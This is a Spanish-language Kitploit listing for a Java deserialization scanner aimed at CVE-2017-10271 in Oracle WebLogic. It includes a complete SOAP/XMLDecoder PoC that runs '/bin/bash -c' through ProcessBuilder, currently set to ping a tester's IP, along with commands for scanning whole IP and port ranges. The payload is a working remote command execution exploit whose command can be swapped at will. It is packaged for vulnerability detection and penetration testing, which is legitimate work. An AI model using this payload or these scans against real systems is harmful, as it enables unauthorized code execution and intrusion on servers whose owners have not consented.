Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
JavaDeserialization — Un escáner de vulnerabilidades de deserialización de Java para vulnerabilidades similares a CVE-2017-10271. | Kitploit
Herramientas/GitHubGitHub/etocheney/javadeserialization
Escáneres de VulnerabilidadesMapeo de RedesGeneración de PayloadsEscaneo de PuertosExplotaciónExplotación de Aplicaciones Web
GitHubetocheney/javadeserialization

JavaDeserialization

Un escáner de vulnerabilidades de deserialización de Java para vulnerabilidades similares a CVE-2017-10271.

Ver Repositorio
91hace 7 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Detección de vulnerabilidades de deserialización en Java

Un escáner de vulnerabilidades de deserialización de Java dirigido a vulnerabilidades similares a CVE-2017-10271. Este proyecto solo contiene un PoC; el resto aún no se ha organizado.

Instalación

  1. Instalar nmap

    https://nmap.org/download.html Según el sistema operativo, descargue e instale la versión correspondiente.

  2. Instalar los paquetes de terceros

    pip install -r requirements.txt

  3. Escaneo

    Modifique el PoC: cambie la dirección IP en el comando ping por su propia dirección IP.

    Modifique el código sniff en la línea 25

    root@kitploit:~
    sniff(filter='icmp and yourIP',prn=packet_callback)
    

    java_scan.py -i IP地址 [options] java_scan.py -h 获得帮助

Uso

1. PoC

Antes de usarlo, asegúrese de modificar el PoC y cambie la dirección IP del comando ping por su propia dirección IP.

Los PoC son dos archivos en formato JSON, uno para Windows y otro para Linux (actualmente no se ha añadido la función de especificar la ruta del PoC; se añadirá en versiones posteriores). Asegúrese de nombrar los PoC como poc.json y poc_win.json en el directorio del programa.

Sobre el formato del PoC (versión Linux; la versión Windows es similar)

root@kitploit:~
{
  "url":"wls-wsat/CoordinatorPortType",
  "header": "Content-Type:text/xml",
  "data": [
    "<soapenv:Envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/'>",
        "<soapenv:Header>",
            "<work:WorkContext xmlns:work='http://bea.com/2004/06/soap/workarea/'>",
               "<java version='1.8.0_131' class='java.beans.XMLDecoder'>",
                    "<void class='java.lang.ProcessBuilder'>",
                        "<array class='java.lang.String' length='3'>",
                            "<void index='0'>",
                                "<string>/bin/bash</string>",
                            "</void>",
                            "<void index='1'>",
                                "<string>-c</string>",
                            "</void>",
                            "<void index='2'>",
                                "<string>ping 10.60.18.5 -c 2</string>",
                            "</void>",
                        "</array>",
                    "<void method='start'/></void>",
                "</java>",
            "</work:WorkContext>",
        "</soapenv:Header>",
        "<soapenv:Body/>",
    "</soapenv:Envelope>"
  ]
}

url especifica el directorio de explotación de la vulnerabilidad; header especifica el contenido de la cabecera añadida al paquete POST; data es el contenido serializado que se enviará.

Nota: este PoC debe hacer que el host vulnerable devuelva 2 paquetes de ping; el programa solo puede confirmar la vulnerabilidad cuando detecta paquetes ICMP.

2. Escanear la red local con nmap

El escaneo predeterminado del programa utiliza nmap para escanear la red local.

root@kitploit:~
java_scan.py -i 192.168.0.1

De esta forma, se escanea el puerto 7001 del host 192.168.0.1.

3. Especificar IP y puerto

Especificar una única IP y puerto.

java_scan.py -i 192.168.0.1 -p 7001

Especificar múltiples IP y puertos.

java_scan.py -i 192.168.0.1,2,55 -p 7001,8001,9001

Especificar un rango de IP y un rango de puertos.

java_scan.py -i 192.168.0.1-255 -p 7000-8000

4. Detección rápida de puertos abiertos

Con el parámetro -f, se utilizará socket para detectar rápidamente los puertos.

java_scan.py -i 192.168.0.1-255 -p 7001 -f

Especificar el número de hilos para la detección rápida de puertos.

java_scan.py -i 192.168.0.1-255 -p 7001 -f -t 100

5. Resultado

effect

Descargar herramienta